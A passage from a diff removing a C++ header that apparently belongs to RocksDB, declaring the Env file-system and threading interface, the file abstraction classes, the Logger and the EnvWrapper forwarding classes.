-                                   unique_ptr<WritableFile>* result,
-                                   const EnvOptions& options);
-
-  // Open `fname` for random read and write, if file doesn't exist the file
-  // will be created.  On success, stores a pointer to the new file in
-  // *result and returns OK.  On failure returns non-OK.
-  //
-  // The returned file will only be accessed by one thread at a time.
-  virtual Status NewRandomRWFile(const std::string& fname,
-                                 unique_ptr<RandomRWFile>* result,
-                                 const EnvOptions& options) {
-    return Status::NotSupported("RandomRWFile is not implemented in this Env");
-  }
-
-  // Create an object that represents a directory. Will fail if directory
-  // doesn't exist. If the directory exists, it will open the directory
-  // and create a new Directory object.
-  //
-  // On success, stores a pointer to the new Directory in
-  // *result and returns OK. On failure stores nullptr in *result and
-  // returns non-OK.
-  virtual Status NewDirectory(const std::string& name,
-                              unique_ptr<Directory>* result) = 0;
-
-  // Returns OK if the named file exists.
-  //         NotFound if the named file does not exist,
-  //                  the calling process does not have permission to determine
-  //                  whether this file exists, or if the path is invalid.
-  //         IOError if an IO Error was encountered
-  virtual Status FileExists(const std::string& fname) = 0;
-
-  // Store in *result the names of the children of the specified directory.
-  // The names are relative to "dir".
-  // Original contents of *results are dropped.
-  // Returns OK if "dir" exists and "*result" contains its children.
-  //         NotFound if "dir" does not exist, the calling process does not have
-  //                  permission to access "dir", or if "dir" is invalid.
-  //         IOError if an IO Error was encountered
-  virtual Status GetChildren(const std::string& dir,
-                             std::vector<std::string>* result) = 0;
-
-  // Store in *result the attributes of the children of the specified directory.
-  // In case the implementation lists the directory prior to iterating the files
-  // and files are concurrently deleted, the deleted files will be omitted from
-  // result.
-  // The name attributes are relative to "dir".
-  // Original contents of *results are dropped.
-  // Returns OK if "dir" exists and "*result" contains its children.
-  //         NotFound if "dir" does not exist, the calling process does not have
-  //                  permission to access "dir", or if "dir" is invalid.
-  //         IOError if an IO Error was encountered
-  virtual Status GetChildrenFileAttributes(const std::string& dir,
-                                           std::vector<FileAttributes>* result);
-
-  // Delete the named file.
-  virtual Status DeleteFile(const std::string& fname) = 0;
-
-  // Create the specified directory. Returns error if directory exists.
-  virtual Status CreateDir(const std::string& dirname) = 0;
-
-  // Creates directory if missing. Return Ok if it exists, or successful in
-  // Creating.
-  virtual Status CreateDirIfMissing(const std::string& dirname) = 0;
-
-  // Delete the specified directory.
-  virtual Status DeleteDir(const std::string& dirname) = 0;
-
-  // Store the size of fname in *file_size.
-  virtual Status GetFileSize(const std::string& fname, uint64_t* file_size) = 0;
-
-  // Store the last modification time of fname in *file_mtime.
-  virtual Status GetFileModificationTime(const std::string& fname,
-                                         uint64_t* file_mtime) = 0;
-  // Rename file src to target.
-  virtual Status RenameFile(const std::string& src,
-                            const std::string& target) = 0;
-
-  // Hard Link file src to target.
-  virtual Status LinkFile(const std::string& src, const std::string& target) {
-    return Status::NotSupported("LinkFile is not supported for this Env");
-  }
-
-  // Lock the specified file.  Used to prevent concurrent access to
-  // the same db by multiple processes.  On failure, stores nullptr in
-  // *lock and returns non-OK.
-  //
-  // On success, stores a pointer to the object that represents the
-  // acquired lock in *lock and returns OK.  The caller should call
-  // UnlockFile(*lock) to release the lock.  If the process exits,
-  // the lock will be automatically released.
-  //
-  // If somebody else already holds the lock, finishes immediately
-  // with a failure.  I.e., this call does not wait for existing locks
-  // to go away.
-  //
-  // May create the named file if it does not already exist.
-  virtual Status LockFile(const std::string& fname, FileLock** lock) = 0;
-
-  // Release the lock acquired by a previous successful call to LockFile.
-  // REQUIRES: lock was returned by a successful LockFile() call
-  // REQUIRES: lock has not already been unlocked.
-  virtual Status UnlockFile(FileLock* lock) = 0;
-
-  // Priority for scheduling job in thread pool
-  enum Priority { BOTTOM, LOW, HIGH, TOTAL };
-
-  // Priority for requesting bytes in rate limiter scheduler
-  enum IOPriority {
-    IO_LOW = 0,
-    IO_HIGH = 1,
-    IO_TOTAL = 2
-  };
-
-  // Arrange to run "(*function)(arg)" once in a background thread, in
-  // the thread pool specified by pri. By default, jobs go to the 'LOW'
-  // priority thread pool.
-
-  // "function" may run in an unspecified thread.  Multiple functions
-  // added to the same Env may run concurrently in different threads.
-  // I.e., the caller may not assume that background work items are
-  // serialized.
-  // When the UnSchedule function is called, the unschedFunction
-  // registered at the time of Schedule is invoked with arg as a parameter.
-  virtual void Schedule(void (*function)(void* arg), void* arg,
-                        Priority pri = LOW, void* tag = nullptr,
-                        void (*unschedFunction)(void* arg) = 0) = 0;
-
-  // Arrange to remove jobs for given arg from the queue_ if they are not
-  // already scheduled. Caller is expected to have exclusive lock on arg.
-  virtual int UnSchedule(void* arg, Priority pri) { return 0; }
-
-  // Start a new thread, invoking "function(arg)" within the new thread.
-  // When "function(arg)" returns, the thread will be destroyed.
-  virtual void StartThread(void (*function)(void* arg), void* arg) = 0;
-
-  // Wait for all threads started by StartThread to terminate.
-  virtual void WaitForJoin() {}
-
-  // Get thread pool queue length for specific thread pool.
-  virtual unsigned int GetThreadPoolQueueLen(Priority pri = LOW) const {
-    return 0;
-  }
-
-  // *path is set to a temporary directory that can be used for testing. It may
-  // or many not have just been created. The directory may or may not differ
-  // between runs of the same process, but subsequent calls will return the
-  // same directory.
-  virtual Status GetTestDirectory(std::string* path) = 0;
-
-  // Create and return a log file for storing informational messages.
-  virtual Status NewLogger(const std::string& fname,
-                           shared_ptr<Logger>* result) = 0;
-
-  // Returns the number of micro-seconds since some fixed point in time.
-  // It is often used as system time such as in GenericRateLimiter
-  // and other places so a port needs to return system time in order to work.
-  virtual uint64_t NowMicros() = 0;
-
-  // Returns the number of nano-seconds since some fixed point in time. Only
-  // useful for computing deltas of time in one run.
-  // Default implementation simply relies on NowMicros.
-  // In platform-specific implementations, NowNanos() should return time points
-  // that are MONOTONIC.
-  virtual uint64_t NowNanos() {
-    return NowMicros() * 1000;
-  }
-
-  // Sleep/delay the thread for the perscribed number of micro-seconds.
-  virtual void SleepForMicroseconds(int micros) = 0;
-
-  // Get the current host name.
-  virtual Status GetHostName(char* name, uint64_t len) = 0;
-
-  // Get the number of seconds since the Epoch, 1970-01-01 00:00:00 (UTC).
-  // Only overwrites *unix_time on success.
-  virtual Status GetCurrentTime(int64_t* unix_time) = 0;
-
-  // Get full directory name for this db.
-  virtual Status GetAbsolutePath(const std::string& db_path,
-      std::string* output_path) = 0;
-
-  // The number of background worker threads of a specific thread pool
-  // for this environment. 'LOW' is the default pool.
-  // default number: 1
-  virtual void SetBackgroundThreads(int number, Priority pri = LOW) = 0;
-  virtual int GetBackgroundThreads(Priority pri = LOW) = 0;
-
-  // Enlarge number of background worker threads of a specific thread pool
-  // for this environment if it is smaller than specified. 'LOW' is the default
-  // pool.
-  virtual void IncBackgroundThreadsIfNeeded(int number, Priority pri) = 0;
-
-  // Lower IO priority for threads from the specified pool.
-  virtual void LowerThreadPoolIOPriority(Priority pool = LOW) {}
-
-  // Converts seconds-since-Jan-01-1970 to a printable string
-  virtual std::string TimeToString(uint64_t time) = 0;
-
-  // Generates a unique id that can be used to identify a db
-  virtual std::string GenerateUniqueId();
-
-  // OptimizeForLogWrite will create a new EnvOptions object that is a copy of
-  // the EnvOptions in the parameters, but is optimized for reading log files.
-  virtual EnvOptions OptimizeForLogRead(const EnvOptions& env_options) const;
-
-  // OptimizeForManifestRead will create a new EnvOptions object that is a copy
-  // of the EnvOptions in the parameters, but is optimized for reading manifest
-  // files.
-  virtual EnvOptions OptimizeForManifestRead(
-      const EnvOptions& env_options) const;
-
-  // OptimizeForLogWrite will create a new EnvOptions object that is a copy of
-  // the EnvOptions in the parameters, but is optimized for writing log files.
-  // Default implementation returns the copy of the same object.
-  virtual EnvOptions OptimizeForLogWrite(const EnvOptions& env_options,
-                                         const DBOptions& db_options) const;
-  // OptimizeForManifestWrite will create a new EnvOptions object that is a copy
-  // of the EnvOptions in the parameters, but is optimized for writing manifest
-  // files. Default implementation returns the copy of the same object.
-  virtual EnvOptions OptimizeForManifestWrite(
-      const EnvOptions& env_options) const;
-
-  // OptimizeForCompactionTableWrite will create a new EnvOptions object that is
-  // a copy of the EnvOptions in the parameters, but is optimized for writing
-  // table files.
-  virtual EnvOptions OptimizeForCompactionTableWrite(
-      const EnvOptions& env_options,
-      const ImmutableDBOptions& db_options) const;
-
-  // OptimizeForCompactionTableWrite will create a new EnvOptions object that
-  // is a copy of the EnvOptions in the parameters, but is optimized for reading
-  // table files.
-  virtual EnvOptions OptimizeForCompactionTableRead(
-      const EnvOptions& env_options,
-      const ImmutableDBOptions& db_options) const;
-
-  // Returns the status of all threads that belong to the current Env.
-  virtual Status GetThreadList(std::vector<ThreadStatus>* thread_list) {
-    return Status::NotSupported("Not supported.");
-  }
-
-  // Returns the pointer to ThreadStatusUpdater.  This function will be
-  // used in RocksDB internally to update thread status and supports
-  // GetThreadList().
-  virtual ThreadStatusUpdater* GetThreadStatusUpdater() const {
-    return thread_status_updater_;
-  }
-
-  // Returns the ID of the current thread.
-  virtual uint64_t GetThreadID() const;
-
- protected:
-  // The pointer to an internal structure that will update the
-  // status of each thread.
-  ThreadStatusUpdater* thread_status_updater_;
-
- private:
-  // No copying allowed
-  Env(const Env&);
-  void operator=(const Env&);
-};
-
-// The factory function to construct a ThreadStatusUpdater.  Any Env
-// that supports GetThreadList() feature should call this function in its
-// constructor to initialize thread_status_updater_.
-ThreadStatusUpdater* CreateThreadStatusUpdater();
-
-// A file abstraction for reading sequentially through a file
-class SequentialFile {
- public:
-  SequentialFile() { }
-  virtual ~SequentialFile();
-
-  // Read up to "n" bytes from the file.  "scratch[0..n-1]" may be
-  // written by this routine.  Sets "*result" to the data that was
-  // read (including if fewer than "n" bytes were successfully read).
-  // May set "*result" to point at data in "scratch[0..n-1]", so
-  // "scratch[0..n-1]" must be live when "*result" is used.
-  // If an error was encountered, returns a non-OK status.
-  //
-  // REQUIRES: External synchronization
-  virtual Status Read(size_t n, Slice* result, char* scratch) = 0;
-
-  // Skip "n" bytes from the file. This is guaranteed to be no
-  // slower that reading the same data, but may be faster.
-  //
-  // If end of file is reached, skipping will stop at the end of the
-  // file, and Skip will return OK.
-  //
-  // REQUIRES: External synchronization
-  virtual Status Skip(uint64_t n) = 0;
-
-  // Indicates the upper layers if the current SequentialFile implementation
-  // uses direct IO.
-  virtual bool use_direct_io() const { return false; }
-
-  // Use the returned alignment value to allocate
-  // aligned buffer for Direct I/O
-  virtual size_t GetRequiredBufferAlignment() const { return kDefaultPageSize; }
-
-  // Remove any kind of caching of data from the offset to offset+length
-  // of this file. If the length is 0, then it refers to the end of file.
-  // If the system is not caching the file contents, then this is a noop.
-  virtual Status InvalidateCache(size_t offset, size_t length) {
-    return Status::NotSupported("InvalidateCache not supported.");
-  }
-
-  // Positioned Read for direct I/O
-  // If Direct I/O enabled, offset, n, and scratch should be properly aligned
-  virtual Status PositionedRead(uint64_t offset, size_t n, Slice* result,
-                                char* scratch) {
-    return Status::NotSupported();
-  }
-};
-
-// A file abstraction for randomly reading the contents of a file.
-class RandomAccessFile {
- public:
-
-  RandomAccessFile() { }
-  virtual ~RandomAccessFile();
-
-  // Read up to "n" bytes from the file starting at "offset".
-  // "scratch[0..n-1]" may be written by this routine.  Sets "*result"
-  // to the data that was read (including if fewer than "n" bytes were
-  // successfully read).  May set "*result" to point at data in
-  // "scratch[0..n-1]", so "scratch[0..n-1]" must be live when
-  // "*result" is used.  If an error was encountered, returns a non-OK
-  // status.
-  //
-  // Safe for concurrent use by multiple threads.
-  // If Direct I/O enabled, offset, n, and scratch should be aligned properly.
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const = 0;
-
-  // Readahead the file starting from offset by n bytes for caching.
-  virtual Status Prefetch(uint64_t offset, size_t n) {
-    return Status::OK();
-  }
-
-  // Tries to get an unique ID for this file that will be the same each time
-  // the file is opened (and will stay the same while the file is open).
-  // Furthermore, it tries to make this ID at most "max_size" bytes. If such an
-  // ID can be created this function returns the length of the ID and places it
-  // in "id"; otherwise, this function returns 0, in which case "id"
-  // may not have been modified.
-  //
-  // This function guarantees, for IDs from a given environment, two unique ids
-  // cannot be made equal to each other by adding arbitrary bytes to one of
-  // them. That is, no unique ID is the prefix of another.
-  //
-  // This function guarantees that the returned ID will not be interpretable as
-  // a single varint.
-  //
-  // Note: these IDs are only valid for the duration of the process.
-  virtual size_t GetUniqueId(char* id, size_t max_size) const {
-    return 0; // Default implementation to prevent issues with backwards
-              // compatibility.
-  };
-
-  enum AccessPattern { NORMAL, RANDOM, SEQUENTIAL, WILLNEED, DONTNEED };
-
-  virtual void Hint(AccessPattern pattern) {}
-
-  // Indicates the upper layers if the current RandomAccessFile implementation
-  // uses direct IO.
-  virtual bool use_direct_io() const { return false; }
-
-  // Use the returned alignment value to allocate
-  // aligned buffer for Direct I/O
-  virtual size_t GetRequiredBufferAlignment() const { return kDefaultPageSize; }
-
-  // Remove any kind of caching of data from the offset to offset+length
-  // of this file. If the length is 0, then it refers to the end of file.
-  // If the system is not caching the file contents, then this is a noop.
-  virtual Status InvalidateCache(size_t offset, size_t length) {
-    return Status::NotSupported("InvalidateCache not supported.");
-  }
-};
-
-// A file abstraction for sequential writing.  The implementation
-// must provide buffering since callers may append small fragments
-// at a time to the file.
-class WritableFile {
- public:
-  WritableFile()
-    : last_preallocated_block_(0),
-      preallocation_block_size_(0),
-      io_priority_(Env::IO_TOTAL) {
-  }
-  virtual ~WritableFile();
-
-  // Append data to the end of the file
-  // Note: A WriteabelFile object must support either Append or
-  // PositionedAppend, so the users cannot mix the two.
-  virtual Status Append(const Slice& data) = 0;
-
-  // PositionedAppend data to the specified offset. The new EOF after append
-  // must be larger than the previous EOF. This is to be used when writes are
-  // not backed by OS buffers and hence has to always start from the start of
-  // the sector. The implementation thus needs to also rewrite the last
-  // partial sector.
-  // Note: PositionAppend does not guarantee moving the file offset after the
-  // write. A WritableFile object must support either Append or
-  // PositionedAppend, so the users cannot mix the two.
-  //
-  // PositionedAppend() can only happen on the page/sector boundaries. For that
-  // reason, if the last write was an incomplete sector we still need to rewind
-  // back to the nearest sector/page and rewrite the portion of it with whatever
-  // we need to add. We need to keep where we stop writing.
-  //
-  // PositionedAppend() can only write whole sectors. For that reason we have to
-  // pad with zeros for the last write and trim the file when closing according
-  // to the position we keep in the previous step.
-  //
-  // PositionedAppend() requires aligned buffer to be passed in. The alignment
-  // required is queried via GetRequiredBufferAlignment()
-  virtual Status PositionedAppend(const Slice& /* data */, uint64_t /* offset */) {
-    return Status::NotSupported();
-  }
-
-  // Truncate is necessary to trim the file to the correct size
-  // before closing. It is not always possible to keep track of the file
-  // size due to whole pages writes. The behavior is undefined if called
-  // with other writes to follow.
-  virtual Status Truncate(uint64_t size) {
-    return Status::OK();
-  }
-  virtual Status Close() = 0;
-  virtual Status Flush() = 0;
-  virtual Status Sync() = 0; // sync data
-
-  /*
-   * Sync data and/or metadata as well.
-   * By default, sync only data.
-   * Override this method for environments where we need to sync
-   * metadata as well.
-   */
-  virtual Status Fsync() {
-    return Sync();
-  }
-
-  // true if Sync() and Fsync() are safe to call concurrently with Append()
-  // and Flush().
-  virtual bool IsSyncThreadSafe() const {
-    return false;
-  }
-
-  // Indicates the upper layers if the current WritableFile implementation
-  // uses direct IO.
-  virtual bool use_direct_io() const { return false; }
-
-  // Use the returned alignment value to allocate
-  // aligned buffer for Direct I/O
-  virtual size_t GetRequiredBufferAlignment() const { return kDefaultPageSize; }
-  /*
-   * Change the priority in rate limiter if rate limiting is enabled.
-   * If rate limiting is not enabled, this call has no effect.
-   */
-  virtual void SetIOPriority(Env::IOPriority pri) {
-    io_priority_ = pri;
-  }
-
-  virtual Env::IOPriority GetIOPriority() { return io_priority_; }
-
-  /*
-   * Get the size of valid data in the file.
-   */
-  virtual uint64_t GetFileSize() {
-    return 0;
-  }
-
-  /*
-   * Get and set the default pre-allocation block size for writes to
-   * this file.  If non-zero, then Allocate will be used to extend the
-   * underlying storage of a file (generally via fallocate) if the Env
-   * instance supports it.
-   */
-  virtual void SetPreallocationBlockSize(size_t size) {
-    preallocation_block_size_ = size;
-  }
-
-  virtual void GetPreallocationStatus(size_t* block_size,
-                                      size_t* last_allocated_block) {
-    *last_allocated_block = last_preallocated_block_;
-    *block_size = preallocation_block_size_;
-  }
-
-  // For documentation, refer to RandomAccessFile::GetUniqueId()
-  virtual size_t GetUniqueId(char* id, size_t max_size) const {
-    return 0; // Default implementation to prevent issues with backwards
-  }
-
-  // Remove any kind of caching of data from the offset to offset+length
-  // of this file. If the length is 0, then it refers to the end of file.
-  // If the system is not caching the file contents, then this is a noop.
-  // This call has no effect on dirty pages in the cache.
-  virtual Status InvalidateCache(size_t offset, size_t length) {
-    return Status::NotSupported("InvalidateCache not supported.");
-  }
-
-  // Sync a file range with disk.
-  // offset is the starting byte of the file range to be synchronized.
-  // nbytes specifies the length of the range to be synchronized.
-  // This asks the OS to initiate flushing the cached data to disk,
-  // without waiting for completion.
-  // Default implementation does nothing.
-  virtual Status RangeSync(uint64_t offset, uint64_t nbytes) { return Status::OK(); }
-
-  // PrepareWrite performs any necessary preparation for a write
-  // before the write actually occurs.  This allows for pre-allocation
-  // of space on devices where it can result in less file
-  // fragmentation and/or less waste from over-zealous filesystem
-  // pre-allocation.
-  virtual void PrepareWrite(size_t offset, size_t len) {
-    if (preallocation_block_size_ == 0) {
-      return;
-    }
-    // If this write would cross one or more preallocation blocks,
-    // determine what the last preallocation block necessary to
-    // cover this write would be and Allocate to that point.
-    const auto block_size = preallocation_block_size_;
-    size_t new_last_preallocated_block =
-      (offset + len + block_size - 1) / block_size;
-    if (new_last_preallocated_block > last_preallocated_block_) {
-      size_t num_spanned_blocks =
-        new_last_preallocated_block - last_preallocated_block_;
-      Allocate(block_size * last_preallocated_block_,
-               block_size * num_spanned_blocks);
-      last_preallocated_block_ = new_last_preallocated_block;
-    }
-  }
-
-  // Pre-allocates space for a file.
-  virtual Status Allocate(uint64_t offset, uint64_t len) {
-    return Status::OK();
-  }
-
- protected:
-  size_t preallocation_block_size() { return preallocation_block_size_; }
-
- private:
-  size_t last_preallocated_block_;
-  size_t preallocation_block_size_;
-  // No copying allowed
-  WritableFile(const WritableFile&);
-  void operator=(const WritableFile&);
-
- protected:
-  friend class WritableFileWrapper;
-  friend class WritableFileMirror;
-
-  Env::IOPriority io_priority_;
-};
-
-// A file abstraction for random reading and writing.
-class RandomRWFile {
- public:
-  RandomRWFile() {}
-  virtual ~RandomRWFile() {}
-
-  // Indicates if the class makes use of direct I/O
-  // If false you must pass aligned buffer to Write()
-  virtual bool use_direct_io() const { return false; }
-
-  // Use the returned alignment value to allocate
-  // aligned buffer for Direct I/O
-  virtual size_t GetRequiredBufferAlignment() const { return kDefaultPageSize; }
-
-  // Write bytes in `data` at  offset `offset`, Returns Status::OK() on success.
-  // Pass aligned buffer when use_direct_io() returns true.
-  virtual Status Write(uint64_t offset, const Slice& data) = 0;
-
-  // Read up to `n` bytes starting from offset `offset` and store them in
-  // result, provided `scratch` size should be at least `n`.
-  // Returns Status::OK() on success.
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const = 0;
-
-  virtual Status Flush() = 0;
-
-  virtual Status Sync() = 0;
-
-  virtual Status Fsync() { return Sync(); }
-
-  virtual Status Close() = 0;
-
-  // No copying allowed
-  RandomRWFile(const RandomRWFile&) = delete;
-  RandomRWFile& operator=(const RandomRWFile&) = delete;
-};
-
-// Directory object represents collection of files and implements
-// filesystem operations that can be executed on directories.
-class Directory {
- public:
-  virtual ~Directory() {}
-  // Fsync directory. Can be called concurrently from multiple threads.
-  virtual Status Fsync() = 0;
-};
-
-enum InfoLogLevel : unsigned char {
-  DEBUG_LEVEL = 0,
-  INFO_LEVEL,
-  WARN_LEVEL,
-  ERROR_LEVEL,
-  FATAL_LEVEL,
-  HEADER_LEVEL,
-  NUM_INFO_LOG_LEVELS,
-};
-
-// An interface for writing log messages.
-class Logger {
- public:
-  size_t kDoNotSupportGetLogFileSize = (std::numeric_limits<size_t>::max)();
-
-  explicit Logger(const InfoLogLevel log_level = InfoLogLevel::INFO_LEVEL)
-      : log_level_(log_level) {}
-  virtual ~Logger();
-
-  // Write a header to the log file with the specified format
-  // It is recommended that you log all header information at the start of the
-  // application. But it is not enforced.
-  virtual void LogHeader(const char* format, va_list ap) {
-    // Default implementation does a simple INFO level log write.
-    // Please override as per the logger class requirement.
-    Logv(format, ap);
-  }
-
-  // Write an entry to the log file with the specified format.
-  virtual void Logv(const char* format, va_list ap) = 0;
-
-  // Write an entry to the log file with the specified log level
-  // and format.  Any log with level under the internal log level
-  // of *this (see @SetInfoLogLevel and @GetInfoLogLevel) will not be
-  // printed.
-  virtual void Logv(const InfoLogLevel log_level, const char* format, va_list ap);
-
-  virtual size_t GetLogFileSize() const { return kDoNotSupportGetLogFileSize; }
-  // Flush to the OS buffers
-  virtual void Flush() {}
-  virtual InfoLogLevel GetInfoLogLevel() const { return log_level_; }
-  virtual void SetInfoLogLevel(const InfoLogLevel log_level) {
-    log_level_ = log_level;
-  }
-
- private:
-  // No copying allowed
-  Logger(const Logger&);
-  void operator=(const Logger&);
-  InfoLogLevel log_level_;
-};
-
-
-// Identifies a locked file.
-class FileLock {
- public:
-  FileLock() { }
-  virtual ~FileLock();
- private:
-  // No copying allowed
-  FileLock(const FileLock&);
-  void operator=(const FileLock&);
-};
-
-extern void LogFlush(const shared_ptr<Logger>& info_log);
-
-extern void Log(const InfoLogLevel log_level,
-                const shared_ptr<Logger>& info_log, const char* format, ...);
-
-// a set of log functions with different log levels.
-extern void Header(const shared_ptr<Logger>& info_log, const char* format, ...);
-extern void Debug(const shared_ptr<Logger>& info_log, const char* format, ...);
-extern void Info(const shared_ptr<Logger>& info_log, const char* format, ...);
-extern void Warn(const shared_ptr<Logger>& info_log, const char* format, ...);
-extern void Error(const shared_ptr<Logger>& info_log, const char* format, ...);
-extern void Fatal(const shared_ptr<Logger>& info_log, const char* format, ...);
-
-// Log the specified data to *info_log if info_log is non-nullptr.
-// The default info log level is InfoLogLevel::INFO_LEVEL.
-extern void Log(const shared_ptr<Logger>& info_log, const char* format, ...)
-#   if defined(__GNUC__) || defined(__clang__)
-    __attribute__((__format__ (__printf__, 2, 3)))
-#   endif
-    ;
-
-extern void LogFlush(Logger *info_log);
-
-extern void Log(const InfoLogLevel log_level, Logger* info_log,
-                const char* format, ...);
-
-// The default info log level is InfoLogLevel::INFO_LEVEL.
-extern void Log(Logger* info_log, const char* format, ...)
-#   if defined(__GNUC__) || defined(__clang__)
-    __attribute__((__format__ (__printf__, 2, 3)))
-#   endif
-    ;
-
-// a set of log functions with different log levels.
-extern void Header(Logger* info_log, const char* format, ...);
-extern void Debug(Logger* info_log, const char* format, ...);
-extern void Info(Logger* info_log, const char* format, ...);
-extern void Warn(Logger* info_log, const char* format, ...);
-extern void Error(Logger* info_log, const char* format, ...);
-extern void Fatal(Logger* info_log, const char* format, ...);
-
-// A utility routine: write "data" to the named file.
-extern Status WriteStringToFile(Env* env, const Slice& data,
-                                const std::string& fname,
-                                bool should_sync = false);
-
-// A utility routine: read contents of named file into *data
-extern Status ReadFileToString(Env* env, const std::string& fname,
-                               std::string* data);
-
-// An implementation of Env that forwards all calls to another Env.
-// May be useful to clients who wish to override just part of the
-// functionality of another Env.
-class EnvWrapper : public Env {
- public:
-  // Initialize an EnvWrapper that delegates all calls to *t
-  explicit EnvWrapper(Env* t) : target_(t) { }
-  ~EnvWrapper() override;
-
-  // Return the target to which this Env forwards all calls
-  Env* target() const { return target_; }
-
-  // The following text is boilerplate that forwards all methods to target()
-  Status NewSequentialFile(const std::string& f, unique_ptr<SequentialFile>* r,
-                           const EnvOptions& options) override {
-    return target_->NewSequentialFile(f, r, options);
-  }
-  Status NewRandomAccessFile(const std::string& f,
-                             unique_ptr<RandomAccessFile>* r,
-                             const EnvOptions& options) override {
-    return target_->NewRandomAccessFile(f, r, options);
-  }
-  Status NewWritableFile(const std::string& f, unique_ptr<WritableFile>* r,
-                         const EnvOptions& options) override {
-    return target_->NewWritableFile(f, r, options);
-  }
-  Status ReopenWritableFile(const std::string& fname,
-                            unique_ptr<WritableFile>* result,
-                            const EnvOptions& options) override {
-    return target_->ReopenWritableFile(fname, result, options);
-  }
-  Status ReuseWritableFile(const std::string& fname,
-                           const std::string& old_fname,
-                           unique_ptr<WritableFile>* r,
-                           const EnvOptions& options) override {
-    return target_->ReuseWritableFile(fname, old_fname, r, options);
-  }
-  Status NewRandomRWFile(const std::string& fname,
-                         unique_ptr<RandomRWFile>* result,
-                         const EnvOptions& options) override {
-    return target_->NewRandomRWFile(fname, result, options);
-  }
-  Status NewDirectory(const std::string& name,
-                      unique_ptr<Directory>* result) override {
-    return target_->NewDirectory(name, result);
-  }
-  Status FileExists(const std::string& f) override {
-    return target_->FileExists(f);
-  }
-  Status GetChildren(const std::string& dir,
-                     std::vector<std::string>* r) override {
-    return target_->GetChildren(dir, r);
-  }
-  Status GetChildrenFileAttributes(
-      const std::string& dir, std::vector<FileAttributes>* result) override {
-    return target_->GetChildrenFileAttributes(dir, result);
-  }
-  Status DeleteFile(const std::string& f) override {
-    return target_->DeleteFile(f);
-  }
-  Status CreateDir(const std::string& d) override {
-    return target_->CreateDir(d);
-  }
-  Status CreateDirIfMissing(const std::string& d) override {
-    return target_->CreateDirIfMissing(d);
-  }
-  Status DeleteDir(const std::string& d) override {
-    return target_->DeleteDir(d);
-  }
-  Status GetFileSize(const std::string& f, uint64_t* s) override {
-    return target_->GetFileSize(f, s);
-  }
-
-  Status GetFileModificationTime(const std::string& fname,
-                                 uint64_t* file_mtime) override {
-    return target_->GetFileModificationTime(fname, file_mtime);
-  }
-
-  Status RenameFile(const std::string& s, const std::string& t) override {
-    return target_->RenameFile(s, t);
-  }
-
-  Status LinkFile(const std::string& s, const std::string& t) override {
-    return target_->LinkFile(s, t);
-  }
-
-  Status LockFile(const std::string& f, FileLock** l) override {
-    return target_->LockFile(f, l);
-  }
-
-  Status UnlockFile(FileLock* l) override { return target_->UnlockFile(l); }
-
-  void Schedule(void (*f)(void* arg), void* a, Priority pri,
-                void* tag = nullptr, void (*u)(void* arg) = 0) override {
-    return target_->Schedule(f, a, pri, tag, u);
-  }
-
-  int UnSchedule(void* tag, Priority pri) override {
-    return target_->UnSchedule(tag, pri);
-  }
-
-  void StartThread(void (*f)(void*), void* a) override {
-    return target_->StartThread(f, a);
-  }
-  void WaitForJoin() override { return target_->WaitForJoin(); }
-  unsigned int GetThreadPoolQueueLen(Priority pri = LOW) const override {
-    return target_->GetThreadPoolQueueLen(pri);
-  }
-  Status GetTestDirectory(std::string* path) override {
-    return target_->GetTestDirectory(path);
-  }
-  Status NewLogger(const std::string& fname,
-                   shared_ptr<Logger>* result) override {
-    return target_->NewLogger(fname, result);
-  }
-  uint64_t NowMicros() override { return target_->NowMicros(); }
-
-  void SleepForMicroseconds(int micros) override {
-    target_->SleepForMicroseconds(micros);
-  }
-  Status GetHostName(char* name, uint64_t len) override {
-    return target_->GetHostName(name, len);
-  }
-  Status GetCurrentTime(int64_t* unix_time) override {
-    return target_->GetCurrentTime(unix_time);
-  }
-  Status GetAbsolutePath(const std::string& db_path,
-                         std::string* output_path) override {
-    return target_->GetAbsolutePath(db_path, output_path);
-  }
-  void SetBackgroundThreads(int num, Priority pri) override {
-    return target_->SetBackgroundThreads(num, pri);
-  }
-  int GetBackgroundThreads(Priority pri) override {
-    return target_->GetBackgroundThreads(pri);
-  }
-
-  void IncBackgroundThreadsIfNeeded(int num, Priority pri) override {
-    return target_->IncBackgroundThreadsIfNeeded(num, pri);
-  }
-
-  void LowerThreadPoolIOPriority(Priority pool = LOW) override {
-    target_->LowerThreadPoolIOPriority(pool);
-  }
-
-  std::string TimeToString(uint64_t time) override {
-    return target_->TimeToString(time);
-  }
-
-  Status GetThreadList(std::vector<ThreadStatus>* thread_list) override {
-    return target_->GetThreadList(thread_list);
-  }
-
-  ThreadStatusUpdater* GetThreadStatusUpdater() const override {
-    return target_->GetThreadStatusUpdater();
-  }
-
-  uint64_t GetThreadID() const override {
-    return target_->GetThreadID();
-  }
-
-  std::string GenerateUniqueId() override {
-    return target_->GenerateUniqueId();
-  }
-
- private:
-  Env* target_;
-};
-
-// An implementation of WritableFile that forwards all calls to another
-// WritableFile. May be useful to clients who wish to override just part of the
-// functionality of another WritableFile.
-// It's declared as friend of WritableFile to allow forwarding calls to
-// protected virtual methods.
-class WritableFileWrapper : public WritableFile {
- public:
-  explicit WritableFileWrapper(WritableFile* t) : target_(t) { }
-
-  Status Append(const Slice& data) override { return target_->Append(data); }
-  Status PositionedAppend(const Slice& data, uint64_t offset) override {
-    return target_->PositionedAppend(data, offset);
-  }
-  Status Truncate(uint64_t size) override { return target_->Truncate(size); }
-  Status Close() override { return target_->Close(); }
-  Status Flush() override { return target_->Flush(); }
-  Status Sync() override { return target_->Sync(); }
-  Status Fsync() override { return target_->Fsync(); }
-  bool IsSyncThreadSafe() const override { return target_->IsSyncThreadSafe(); }
-  void SetIOPriority(Env::IOPriority pri) override {
-    target_->SetIOPriority(pri);
-  }
-  Env::IOPriority GetIOPriority() override { return target_->GetIOPriority(); }
-  uint64_t GetFileSize() override { return target_->GetFileSize(); }
-  void GetPreallocationStatus(size_t* block_size,
-                              size_t* last_allocated_block) override {
-    target_->GetPreallocationStatus(block_size, last_allocated_block);
-  }
-  size_t GetUniqueId(char* id, size_t max_size) const override {
-    return target_->GetUniqueId(id, max_size);
-  }
-  Status InvalidateCache(size_t offset, size_t length) override {
-    return target_->InvalidateCache(offset, length);
-  }
-
-  void SetPreallocationBlockSize(size_t size) override {
-    target_->SetPreallocationBlockSize(size);
-  }
-  void PrepareWrite(size_t offset, size_t len) override {
-    target_->PrepareWrite(offset, len);
-  }
-
- protected:
